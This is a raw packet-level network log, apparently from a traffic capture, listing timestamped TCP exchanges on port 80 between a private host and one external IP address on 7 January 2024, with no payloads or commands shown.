                                                                                                                                                                    Jan 7, 2024 05:29:32.833956003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.834032059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.834228992 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.947365999 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.950151920 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.950200081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.950448990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.952874899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.953110933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.953166962 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.954691887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.954739094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.954777002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.956116915 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.956830978 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.956892014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.956901073 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.956974030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.956988096 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.957988024 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.958003998 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.958069086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.959002018 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.959053040 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.959136963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.959192991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.959207058 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.959255934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.962043047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.962088108 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.962091923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.962529898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.962611914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.962660074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.962678909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.962723970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:32.962743044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.967279911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:32.967338085 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.027683020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.027848005 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.027944088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.029449940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.029474974 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.029534101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.029544115 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.091057062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.144009113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.147758007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.147799015 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.147820950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.147953033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.147994041 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.148016930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.148628950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.148669004 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.151104927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.151160002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.151201010 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.152055025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152143002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152187109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.152316093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152359009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152400017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.152453899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152533054 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.152576923 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.153959990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.154032946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.154073954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.154097080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.156672001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.156718016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.156840086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.157422066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.157474995 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.157821894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.157989025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.158061028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.158083916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.161653042 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.161695957 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.161705017 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.221604109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.221622944 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.221657991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.223205090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.223242044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.223247051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.286438942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.286494017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.286514044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343130112 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343187094 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.343214989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343323946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343378067 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.343535900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343831062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343847990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.343877077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.345366001 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.345412016 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.345978022 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346386909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346429110 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.346518993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346596956 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346642017 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.346699953 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346807957 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.346846104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.346888065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.348141909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.348190069 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.348259926 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.350756884 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.350797892 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.350876093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.351574898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.351614952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.352500916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.352596045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.352644920 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.357311010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.358712912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.358763933 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.418734074 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.418814898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.418855906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.420430899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.420531034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.420574903 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.481933117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.481976986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.482018948 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.482023954 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.482151031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.482237101 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.538463116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.538789988 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.538834095 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.538886070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.538985014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.539021969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.539062023 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.539150000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.539190054 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.540468931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.540515900 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.540559053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.541702986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.541783094 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.541829109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.541873932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.541982889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.542021990 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.542057991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.542165995 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.542208910 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.543322086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.543401003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.543456078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.545933008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.546013117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.546051025 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.546732903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.546824932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.546863079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.547897100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.547957897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.548003912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.555208921 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.555280924 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.555324078 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.614435911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.614536047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.614583969 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.616076946 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.616187096 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.616235018 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.676795959 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.676911116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.676966906 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.676995993 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.677087069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.677131891 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.732551098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.732600927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.732649088 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.732753992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.732878923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.732924938 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.732960939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.733031034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.733067036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.734446049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.734543085 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.734576941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.735589981 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.735634089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.735678911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.735811949 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.735939980 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.735977888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.736046076 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.736113071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.736149073 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.738214016 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.738296032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.738338947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.739933968 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.740067005 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.740109921 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.741075039 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.741178989 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.741224051 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.742260933 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.742435932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.742494106 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.749929905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.749946117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.749989986 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.809835911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.809940100 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.809986115 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.811984062 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.812002897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.812047005 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.873430014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.873583078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.873631001 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.873667002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.873888969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.873929977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.934206963 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934353113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934416056 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.934470892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934550047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934668064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934732914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.934741020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934782028 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.934811115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934880972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.934916019 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.936260939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.936400890 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.936444998 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.937901020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.937944889 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.937983036 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.937994003 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.938071012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.938116074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.938554049 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.938721895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.938771009 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.940979004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.941032887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.941082954 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.942648888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.942701101 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.942747116 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.943759918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.943804026 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.943862915 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.944825888 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.951378107 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:33.951419115 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:33.951437950 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.007257938 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.007280111 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.007503033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.008884907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.008944035 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.009016037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.072324038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.072442055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.072453976 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.072455883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.072470903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.072508097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.128751040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.128786087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.128854990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.128916979 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.128936052 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.128982067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.129024982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.129028082 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.129086971 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.129129887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.129221916 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.130625010 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.130681992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:34.131737947 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:34.132030010 CET804973591.215.85.120192.168.2.4
